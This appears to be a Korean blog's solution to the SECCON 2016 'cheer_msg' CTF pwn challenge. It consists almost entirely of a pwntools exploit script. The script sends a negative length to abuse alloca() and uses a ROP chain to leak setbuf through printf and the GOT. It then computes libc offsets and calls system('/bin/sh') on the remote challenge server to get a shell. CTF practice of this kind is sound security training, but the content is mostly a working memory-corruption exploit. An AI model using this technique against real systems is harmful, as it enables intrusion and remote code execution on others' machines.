요약: alloca 에 음수줘서 stack 해꼬질함.
summary: negative index to alloca() and fuckup the stack.
from pwn import *
context.arch = 'i386' # i386 / arm
# recvuntil sendline, pack, recv, send
r = remote('cheermsg.pwn.seccon.jp', 30527)
#r = process(['./cheer_msg'])
raw_input('attach')
# start pwn.
print r.recvuntil('Message Length >> ')
r.sendline('-144')
print r.recvuntil('Name >> ')
# ROP start!
pr = 0x80487af
got = 0x804a00c
printf = 0x8048430
main = 0x80485ca
system = 0
binsh = 0
payload = ''
payload += pack(printf)
payload += pack(pr)
payload += pack(got)
payload += pack(main)
r.sendline(payload)
sleep(1)
leak = r.recv(8192)
print leak.encode('hex')
setbuf = int(leak.split(': \n')[1][:4][::-1].encode('hex'), 16)
print hex(setbuf)
raw_input('leak ok?')
system_offset = -0x27810 # server
#system_offset = -0x27800 # local
binsh_offset = +0xf8d2c # server
#binsh_offset = +0xf9094 # local
# stage2.
#print r.recvuntil('Message Length >> ')
r.sendline('-144')
print r.recvuntil('Name >> ')
# ROP start!
system = setbuf + system_offset
binsh = setbuf + binsh_offset
payload = pack(system)
payload += pack(0)
payload += pack(binsh)
r.sendline(payload)
# get shell?
r.interactive()
'Games > CTF' 카테고리의 다른 글
DEFCON 2017 empanada writeup (0) | 2017.05.08 |
---|---|
DEFCON 2017 awsno writeup (0) | 2017.05.08 |
SECCON 2016 checker (0) | 2016.12.12 |
SECCON 2016 logger (0) | 2016.12.11 |
SECCON 2016 jumper (0) | 2016.12.11 |